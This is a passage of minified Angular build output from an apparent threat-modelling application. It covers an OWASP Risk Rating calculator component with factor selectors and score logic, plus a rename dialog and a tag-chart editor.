C9e=function(){return[0,1,3,5,6,9]},BG=function(){return[0,1,3,7,9]},y9e=function(){return[0,2,6,7,9]},b9e=function(){return[0,1,4,9]},M9e=function(){return[0,1,5,9]},v9e=function(){return[0,1,3,5,7,9]},A9e=function(){return[0,1,4,5,9]},T9e=function(){return[0,4,7,9]},E9e=function(){return[0,1,4,6,9]},D9e=function(){return[0,1,5,7,9]},x9e=function(){return[0,2,5,7]},w9e=function(){return[0,2,4,5,6,9]},I9e=function(){return[0,1,3,8,9]},R9e=function(){return[0,1,7,9]},S9e=function(){return[0,3,5,7,9]};function k9e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n  "),m(2,"tr"),s(3,"\n    "),m(4,"td",1)(5,"h2",2),s(6,"Likelihood Factors"),u()(),s(7,"\n    "),m(8,"td",1)(9,"h2",2),s(10,"Impact Factors"),u()(),s(11,"\n  "),u(),s(12,"\n  "),m(13,"tr"),s(14,"\n    "),m(15,"td",3)(16,"h3",2),s(17,"Threat Agent Factors"),u()(),s(18,"\n    "),m(19,"td",3)(20,"h3",2),s(21,"Vulnerability Factors"),u()(),s(22,"\n    "),m(23,"td",3)(24,"h3",2),s(25,"Technical Impact Factors"),u()(),s(26,"\n    "),m(27,"td",3)(28,"h3",2),s(29,"Business Impact Factors"),u()(),s(30,"\n  "),u(),s(31,"\n  "),m(32,"tr"),s(33,"\n    "),m(34,"td"),s(35,"\n      "),m(36,"mat-form-field",4),s(37,"\n        "),m(38,"mat-label"),s(39),oe(40,"translate"),u(),s(41,"\n        "),m(42,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.SL=n)}),s(43,"\n          "),ne(44,i9e,3,4,"mat-option",6),s(45,"\n        "),u(),s(46,"\n        "),m(47,"mat-icon",7),oe(48,"translate"),s(49,"info"),u(),s(50,"\n      "),u(),s(51,"\n    "),u(),s(52,"\n    "),m(53,"td"),s(54,"\n      "),m(55,"mat-form-field",4),s(56,"\n        "),m(57,"mat-label"),s(58),oe(59,"translate"),u(),s(60,"\n        "),m(61,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.ED=n)}),s(62,"\n          "),ne(63,a9e,3,4,"mat-option",6),s(64,"\n        "),u(),s(65,"\n        "),m(66,"mat-icon",7),oe(67,"translate"),s(68,"info"),u(),s(69,"\n      "),u(),s(70,"\n    "),u(),s(71,"\n    "),m(72,"td"),s(73,"\n      "),m(74,"mat-form-field",4),s(75,"\n        "),m(76,"mat-label"),s(77),oe(78,"translate"),u(),s(79,"\n        "),m(80,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LC=n)}),s(81,"\n          "),ne(82,n9e,3,4,"mat-option",6),s(83,"\n        "),u(),s(84,"\n        "),m(85,"mat-icon",7),oe(86,"translate"),s(87,"info"),u(),s(88,"\n      "),u(),s(89,"\n    "),u(),s(90,"\n    "),m(91,"td"),s(92,"\n      "),m(93,"mat-form-field",4),s(94,"\n        "),m(95,"mat-label"),s(96),oe(97,"translate"),u(),s(98,"\n        "),m(99,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.FD=n)}),s(100,"\n          "),ne(101,o9e,3,4,"mat-option",6),s(102,"\n        "),u(),s(103,"\n        "),m(104,"mat-icon",7),oe(105,"translate"),s(106,"info"),u(),s(107,"\n      "),u(),s(108,"\n    "),u(),s(109,"\n  "),u(),s(110,"\n  "),m(111,"tr"),s(112,"\n    "),m(113,"td"),s(114,"\n      "),m(115,"mat-form-field",4),s(116,"\n        "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n        "),m(121,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.M=n)}),s(122,"\n          "),ne(123,r9e,3,4,"mat-option",6),s(124,"\n        "),u(),s(125,"\n        "),m(126,"mat-icon",7),oe(127,"translate"),s(128,"info"),u(),s(129,"\n      "),u(),s(130,"\n    "),u(),s(131,"\n    "),m(132,"td"),s(133,"\n      "),m(134,"mat-form-field",4),s(135,"\n        "),m(136,"mat-label"),s(137),oe(138,"translate"),u(),s(139,"\n        "),m(140,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.EE=n)}),s(141,"\n          "),ne(142,s9e,3,4,"mat-option",6),s(143,"\n        "),u(),s(144,"\n        "),m(145,"mat-icon",7),oe(146,"translate"),s(147,"info"),u(),s(148,"\n      "),u(),s(149,"\n    "),u(),s(150,"\n    "),m(151,"td"),s(152,"\n      "),m(153,"mat-form-field",4),s(154,"\n        "),m(155,"mat-label"),s(156),oe(157,"translate"),u(),s(158,"\n        "),m(159,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LI=n)}),s(160,"\n          "),ne(161,c9e,3,4,"mat-option",6),s(162,"\n        "),u(),s(163,"\n        "),m(164,"mat-icon",7),oe(165,"translate"),s(166,"info"),u(),s(167,"\n      "),u(),s(168,"\n    "),u(),s(169,"\n    "),m(170,"td"),s(171,"\n      "),m(172,"mat-form-field",4),s(173,"\n        "),m(174,"mat-label"),s(175),oe(176,"translate"),u(),s(177,"\n        "),m(178,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.RD=n)}),s(179,"\n          "),ne(180,l9e,3,4,"mat-option",6),s(181,"\n        "),u(),s(182,"\n        "),m(183,"mat-icon",7),oe(184,"translate"),s(185,"info"),u(),s(186,"\n      "),u(),s(187,"\n    "),u(),s(188,"\n  "),u(),s(189,"\n  "),m(190,"tr"),s(191,"\n    "),m(192,"td"),s(193,"\n      "),m(194,"mat-form-field",4),s(195,"\n        "),m(196,"mat-label"),s(197),oe(198,"translate"),u(),s(199,"\n        "),m(200,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.O=n)}),s(201,"\n          "),ne(202,d9e,3,4,"mat-option",6),s(203,"\n        "),u(),s(204,"\n        "),m(205,"mat-icon",7),oe(206,"translate"),s(207,"info"),u(),s(208,"\n      "),u(),s(209,"\n    "),u(),s(210,"\n    "),m(211,"td"),s(212,"\n      "),m(213,"mat-form-field",4),s(214,"\n        "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n        "),m(219,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.A=n)}),s(220,"\n          "),ne(221,m9e,3,4,"mat-option",6),s(222,"\n        "),u(),s(223,"\n        "),m(224,"mat-icon",7),oe(225,"translate"),s(226,"info"),u(),s(227,"\n      "),u(),s(228,"\n    "),u(),s(229,"\n    "),m(230,"td"),s(231,"\n      "),m(232,"mat-form-field",4),s(233,"\n        "),m(234,"mat-label"),s(235),oe(236,"translate"),u(),s(237,"\n        "),m(238,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LAV=n)}),s(239,"\n          "),ne(240,u9e,3,4,"mat-option",6),s(241,"\n        "),u(),s(242,"\n        "),m(243,"mat-icon",7),oe(244,"translate"),s(245,"info"),u(),s(246,"\n      "),u(),s(247,"\n    "),u(),s(248,"\n    "),m(249,"td"),s(250,"\n      "),m(251,"mat-form-field",4),s(252,"\n        "),m(253,"mat-label"),s(254),oe(255,"translate"),u(),s(256,"\n        "),m(257,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.NC=n)}),s(258,"\n          "),ne(259,h9e,3,4,"mat-option",6),s(260,"\n        "),u(),s(261,"\n        "),m(262,"mat-icon",7),oe(263,"translate"),s(264,"info"),u(),s(265,"\n      "),u(),s(266,"\n    "),u(),s(267,"\n  "),u(),s(268,"\n  "),m(269,"tr"),s(270,"\n    "),m(271,"td"),s(272,"\n      "),m(273,"mat-form-field",4),s(274,"\n        "),m(275,"mat-label"),s(276),oe(277,"translate"),u(),s(278,"\n        "),m(279,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.S=n)}),s(280,"\n          "),ne(281,f9e,3,4,"mat-option",6),s(282,"\n        "),u(),s(283,"\n        "),m(284,"mat-icon",7),oe(285,"translate"),s(286,"info"),u(),s(287,"\n      "),u(),s(288,"\n    "),u(),s(289,"\n    "),m(290,"td"),s(291,"\n      "),m(292,"mat-form-field",4),s(293,"\n        "),m(294,"mat-label"),s(295),oe(296,"translate"),u(),s(297,"\n        "),m(298,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.ID=n)}),s(299,"\n          "),ne(300,p9e,3,4,"mat-option",6),s(301,"\n        "),u(),s(302,"\n        "),m(303,"mat-icon",7),oe(304,"translate"),s(305,"info"),u(),s(306,"\n      "),u(),s(307,"\n    "),u(),s(308,"\n    "),m(309,"td"),s(310,"\n      "),m(311,"mat-form-field",4),s(312,"\n        "),m(313,"mat-label"),s(314),oe(315,"translate"),u(),s(316,"\n        "),m(317,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LAC=n)}),s(318,"\n          "),ne(319,_9e,3,4,"mat-option",6),s(320,"\n        "),u(),s(321,"\n        "),m(322,"mat-icon",7),oe(323,"translate"),s(324,"info"),u(),s(325,"\n      "),u(),s(326,"\n    "),u(),s(327,"\n    "),m(328,"td"),s(329,"\n      "),m(330,"mat-form-field",4),s(331,"\n        "),m(332,"mat-label"),s(333),oe(334,"translate"),u(),s(335,"\n        "),m(336,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.PV=n)}),s(337,"\n          "),ne(338,g9e,3,4,"mat-option",6),s(339,"\n        "),u(),s(340,"\n        "),m(341,"mat-icon",7),oe(342,"translate"),s(343,"info"),u(),s(344,"\n      "),u(),s(345,"\n    "),u(),s(346,"\n  "),u(),s(347,"\n  "),m(348,"tr"),s(349,"\n    "),m(350,"td")(351,"h3"),s(352,"Threat Agent Factor:"),it(353,"br"),s(354),u()(),s(355,"\n    "),m(356,"td")(357,"h3"),s(358,"Vulnerability Factor:"),it(359,"br"),s(360),u()(),s(361,"\n    "),m(362,"td")(363,"h3"),s(364,"Technical Impact Factor:"),it(365,"br"),s(366),u()(),s(367,"\n    "),m(368,"td")(369,"h3"),s(370,"Business Impact Factor:"),it(371,"br"),s(372),u()(),s(373,"\n  "),u(),s(374,"\n  "),m(375,"tr"),s(376,"\n    "),m(377,"td",1)(378,"h3",2),s(379),u()(),s(380,"\n    "),m(381,"td",1)(382,"h3",2),s(383),u()(),s(384,"\n  "),u(),s(385,"\n  "),m(386,"tr"),s(387,"\n    "),m(388,"td",8)(389,"h3"),s(390),u()(),s(391,"\n  "),u(),s(392,"\n  "),m(393,"tr"),s(394,"\n    "),m(395,"td",8),s(396,"Score Vector: "),m(397,"a",9),s(398),u()(),s(399,"\n  "),u(),s(400,"\n"),u()}if(2&t){const e=B();C(39),ke(re(40,73,"shared.owasprr.sl")),C(3),V("value",e.entry.SL),C(2),V("ngForOf",kr(137,C9e)),C(3),at("matTooltip",re(48,75,"shared.owasprr.sl.tt")),C(11),ke(re(59,77,"shared.owasprr.ed")),C(3),V("value",e.entry.ED),C(2),V("ngForOf",kr(138,BG)),C(3),at("matTooltip",re(67,79,"shared.owasprr.ed.tt")),C(11),ke(re(78,81,"shared.owasprr.lc")),C(3),V("value",e.entry.LC),C(2),V("ngForOf",kr(139,y9e)),C(3),at("matTooltip",re(86,83,"shared.owasprr.lc.tt")),C(11),ke(re(97,85,"shared.owasprr.fd")),C(3),V("value",e.entry.FD),C(2),V("ngForOf",kr(140,BG)),C(3),at("matTooltip",re(105,87,"shared.owasprr.fd.tt")),C(14),ke(re(119,89,"shared.owasprr.m")),C(3),V("value",e.entry.M),C(2),V("ngForOf",kr(141,b9e)),C(3),at("matTooltip",re(127,91,"shared.owasprr.m.tt")),C(11),ke(re(138,93,"shared.owasprr.ee")),C(3),V("value",e.entry.EE),C(2),V("ngForOf",kr(142,M9e)),C(3),at("matTooltip",re(146,95,"shared.owasprr.ee.tt")),C(11),ke(re(157,97,"shared.owasprr.li")),C(3),V("value",e.entry.LI),C(2),V("ngForOf",kr(143,v9e)),C(3),at("matTooltip",re(165,99,"shared.owasprr.li.tt")),C(11),ke(re(176,101,"shared.owasprr.rd")),C(3),V("value",e.entry.RD),C(2),V("ngForOf",kr(144,A9e)),C(3),at("matTooltip",re(184,103,"shared.owasprr.rd.tt")),C(14),ke(re(198,105,"shared.owasprr.o")),C(3),V("value",e.entry.O),C(2),V("ngForOf",kr(145,T9e)),C(3),at("matTooltip",re(206,107,"shared.owasprr.o.tt")),C(11),ke(re(217,109,"shared.owasprr.a")),C(3),V("value",e.entry.A),C(2),V("ngForOf",kr(146,E9e)),C(3),at("matTooltip",re(225,111,"shared.owasprr.a.tt")),C(11),ke(re(236,113,"shared.owasprr.lav")),C(3),V("value",e.entry.LAV),C(2),V("ngForOf",kr(147,D9e)),C(3),at("matTooltip",re(244,115,"shared.owasprr.lav.tt")),C(11),ke(re(255,117,"shared.owasprr.nc")),C(3),V("value",e.entry.NC),C(2),V("ngForOf",kr(148,x9e)),C(3),at("matTooltip",re(263,119,"shared.owasprr.nc.tt")),C(14),ke(re(277,121,"shared.owasprr.s")),C(3),V("value",e.entry.S),C(2),V("ngForOf",kr(149,w9e)),C(3),at("matTooltip",re(285,123,"shared.owasprr.s.tt")),C(11),ke(re(296,125,"shared.owasprr.id")),C(3),V("value",e.entry.ID),C(2),V("ngForOf",kr(150,I9e)),C(3),at("matTooltip",re(304,127,"shared.owasprr.id.tt")),C(11),ke(re(315,129,"shared.owasprr.lac")),C(3),V("value",e.entry.LAC),C(2),V("ngForOf",kr(151,R9e)),C(3),at("matTooltip",re(323,131,"shared.owasprr.lac.tt")),C(11),ke(re(334,133,"shared.owasprr.pv")),C(3),V("value",e.entry.PV),C(2),V("ngForOf",kr(152,S9e)),C(3),at("matTooltip",re(342,135,"shared.owasprr.pv.tt")),C(13),ke(e.GetLabelThreatAgent()),C(6),ke(e.GetLabelVulnerability()),C(6),ke(e.GetLabelTechnicalImpact()),C(6),ke(e.GetLabelBusinessImpact()),C(7),ct("Likelihood Factor: ",e.GetLabelLikelihood(),""),C(4),ct("Impact Factor: ",e.GetLabelImpact(),""),C(7),ct("Overall Risk Severity: ",e.GetLabelOverallRisk(),""),C(7),at("href",e.GetURL(),nm),C(1),ke(e.GetVector())}}let IT=(()=>{class t{constructor(e,i,n){this.data=e,this.dataService=i,this.translate=n,e&&(this.entry=e.Value)}ngOnInit(){this.GetLabelOverallRisk()}OpenCalculator(){this.GetVector()&&window.open(this.GetURL(),"_blank")}GetFactorThreatAgent(){return this.getFactor([this.entry.SL,this.entry.M,this.entry.O,this.entry.S])}GetFactorVulnerability(){return this.getFactor([this.entry.ED,this.entry.EE,this.entry.A,this.entry.ID])}GetFactorTechnicalImpact(){return this.getFactor([this.entry.LC,this.entry.LI,this.entry.LAV,this.entry.LAC])}GetFactorBusinessImpact(){return this.getFactor([this.entry.FD,this.entry.RD,this.entry.NC,this.entry.PV])}GetFactorLikelihood(){return this.getFactor([this.GetFactorThreatAgent(),this.GetFactorVulnerability()])}GetFactorImpact(){return this.getFactor([this.GetFactorTechnicalImpact(),this.GetFactorBusinessImpact()])}GetLabelThreatAgent(){return this.getFactorCategoryString(this.GetFactorThreatAgent())}GetLabelVulnerability(){return this.getFactorCategoryString(this.GetFactorVulnerability())}GetLabelTechnicalImpact(){return this.getFactorCategoryString(this.GetFactorTechnicalImpact())}GetLabelBusinessImpact(){return this.getFactorCategoryString(this.GetFactorBusinessImpact())}GetLabelLikelihood(){return this.getFactorCategoryString(this.GetFactorLikelihood())}GetLabelImpact(){return this.getFactorCategoryString(this.GetFactorImpact())}GetLabelOverallRisk(){const e=[this.getFactorCategory(this.GetFactorImpact()),this.getFactorCategory(this.GetFactorLikelihood())];let i=cn.None;return e.every(n=>n==dr.High)?i=cn.Critical:e.some(n=>n==dr.High)&&e.some(n=>n==dr.Medium)?i=cn.High:e.every(n=>n==dr.Medium)||e.some(n=>n==dr.High)?i=cn.Medium:e.some(n=>n==dr.Medium)&&(i=cn.Low),i!=this.entry.Score&&setTimeout(()=>{this.entry.Impact=this.getFactorCategory(this.GetFactorImpact()),this.entry.Likelihood=this.getFactorCategory(this.GetFactorLikelihood()),this.entry.Score=i},10),this.translate.instant(vn.ToString(i))}getFactor(e){let i=0;return e.filter(n=>n).forEach(n=>i+=n),i/e.length}getFactorCategory(e){let i=dr.Low;return e>=3&&e<6?i=dr.Medium:e>=6&&(i=dr.High),i}getFactorCategoryString(e){return 0==e?"":this.translate.instant(An.ToString(this.getFactorCategory(e)))+" ("+e.toFixed(2)+")"}GetURL(){return t.GetURL(this.entry)}GetVector(){return t.GetVector(this.entry)}static GetURL(e){let i=t.GetVector(e);return i?"https://owasp-risk-rating.com/?vector=("+i+")":null}static GetVector(e){if(e){let i="";return Object.keys(e).forEach(n=>{e[n]&&n.length<=3&&(i+="/"+n+":"+e[n])}),i}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(P5,8),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-owasp-rr-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["colspan","2"],[2,"margin","0"],[2,"width","25%"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matSuffix","","matTooltipShowDelay","1000",3,"matTooltip"],["colspan","4"],["target","_blank",3,"href"],[3,"value"]],template:function(e,i){1&e&&ne(0,k9e,401,153,"table",0),2&e&&V("ngIf",null!=i.entry)},dependencies:[Zi,Ri,oa,nn,un,jr,Nr,yr,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();function P9e(t,a){if(1&t){const e=Ye();m(0,"button",6),he("click",function(){return be(e),Me(B().Value="")}),s(1,"\n      "),m(2,"mat-icon"),s(3,"close"),u(),s(4,"\n    "),u()}}let O9e=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i}get Value(){return this.data.Object.GetProperty(this.data.Property.ID)}set Value(e){this.data.Object.SetProperty(this.data.Property.ID,e)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-rename-dialog"]],decls:20,vars:9,consts:[["mat-dialog-title",""],["appearance","fill",1,"example-form-field"],["matInput","","type","text",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["align","end"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["matSuffix","","mat-icon-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"mat-form-field",1),s(7,"\n    "),m(8,"input",2),he("ngModelChange",function(r){return i.Value=r}),u(),s(9,"\n    "),ne(10,P9e,5,0,"button",3),s(11,"\n  "),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-dialog-actions",4),s(15,"\n  "),m(16,"button",5),s(17),oe(18,"translate"),u(),s(19,"\n"),u()),2&e&&(C(1),ke(re(2,5,"dialog.rename.title")),C(7),V("ngModel",i.Value),C(2),V("ngIf",i.Value),C(6),V("mat-dialog-close",!0),C(1),ke(re(18,7,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();function N9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",8),he("click",function(){const r=be(e).$implicit;return Me(B().selectedChart=r)}),s(1,"\n        "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n        "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n        "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteChart(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"delete"),u()(),s(13,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedChart===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedChart===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,7,e.Name)),C(3),at("matTooltip",re(10,9,"general.Delete"))}}function L9e(t,a){if(1&t&&(m(0,"mat-option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTypeName(e)))}}function z9e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddTagToChart(r))}),m(1,"mat-icon",25),s(2,"circle"),u(),s(3),u()}if(2&t){const e=a.$implicit;C(1),ri("color",e.Color),C(2),ct(" ",e.Name,"")}}function W9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),s(1,"\n          "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveTag(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n        "),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(6),ke(re(7,3,e.Name)),C(3),at("matTooltip",re(10,5,"general.Remove"))}}function F9e(t,a){if(1&t){const e=Ye();m(0,"div",12),s(1,"\n      "),m(2,"mat-form-field",13),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"input",14),he("ngModelChange",function(n){return be(e),Me(B().selectedChart.Name=n)}),u(),s(9,"\n      "),u(),s(10,"\n      "),m(11,"mat-form-field",15),s(12,"\n        "),m(13,"mat-select",16),he("ngModelChange",function(n){return be(e),Me(B().selectedChart.Type=n)}),s(14,"\n          "),ne(15,L9e,3,4,"mat-option",17),s(16,"\n        "),u(),s(17,"\n      "),u(),s(18,"\n      "),m(19,"mat-list",18),he("cdkDropListDropped",function(n){return be(e),Me(B().dropTag(n))}),s(20,"\n        "),m(21,"div",3),s(22),oe(23,"translate"),m(24,"button",19),oe(25,"translate"),m(26,"mat-icon"),s(27,"add"),u()(),s(28,"\n          "),m(29,"mat-menu",null,20),s(31,"\n            "),ne(32,z9e,4,3,"button",21),s(33,"\n          "),u(),s(34,"\n        "),u(),s(35,"\n        "),ne(36,W9e,14,7,"mat-list-item",22),s(37,"\n      "),u(),s(38,"\n    "),u()}if(2&t){const e=Ti(30),i=B();C(5),ke(re(6,15,"properties.Name")),C(3),at("matTooltip",i.selectedChart.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.selectedChart.Name),C(5),V("ngModel",i.selectedChart.Type),C(2),V("ngForOf",i.GetTypes()),C(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(23,17,"general.Tags")," \n          "),C(2),at("matTooltip",re(25,19,"general.Add")),V("matMenuTriggerFor",e),C(8),V("ngForOf",i.GetPossibleTags()),C(4),V("ngForOf",i.selectedChart.MyTags)}}let V9e=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n}get charts(){return this.dataService.Project.GetMyTagCharts()}ngOnInit(){}AddChart(){this.selectedChart=this.dataService.Project.CreateMyTagChart()}DeleteChart(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(e==this.selectedChart&&(this.selectedChart=null),this.dataService.Project.DeleteMyTagChart(e))})}AddTagToChart(e){this.selectedChart.AddMyTag(e)}RemoveTag(e){this.selectedChart.RemoveMyTag(e.ID)}GetPossibleTags(){return this.dataService.Project.GetMyTags().filter(e=>!this.selectedChart.MyTags.includes(e))}dropChart(e){Qs(this.dataService.Project.GetMyTagCharts(),e.previousIndex,e.currentIndex)}dropTag(e){Qs(this.selectedChart.Data.myTagIDs,e.previousIndex,e.currentIndex)}GetTypes(){return LG.GetKeys()}GetTypeName(e){return LG.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-tag-charts"]],decls:24,vars:12,consts:[[1,"row",2,"margin-bottom","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],[1,"property-form-field"],[3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],["cdkDropList","",1,"prop-list","reorder-list","property-form-field",3,"cdkDropListDropped"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip",4,"ngFor","ngForOf"],[3,"value"],["mat-menu-item","",3,"click"],[2,"margin-right","5px"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"mat-list",2),he("cdkDropListDropped",function(r){return i.dropChart(r)}),s(5,"\n      "),m(6,"div",3),s(7),oe(8,"translate"),m(9,"button",4),he("click",function(){return i.AddChart()}),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,N9e,14,11,"mat-list-item",5),s(16,"\n    "),u(),s(17,"\n  "),u(),s(18,"\n  "),m(19,"div",6),s(20,"\n    "),ne(21,F9e,39,21,"div",7),s(22,"\n  "),u(),s(23,"\n"),u()),2&e&&(C(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(8,8,"dialog.tagcharts.Charts")," \n        "),C(2),at("matTooltip",re(10,10,"general.Add")),C(6),V("ngForOf",i.charts),C(6),V("ngIf",i.selectedChart))},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,da,nn,un,Nr,yr,Xa,ts,is,Or,Lr,rc,Xo,qo,po,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   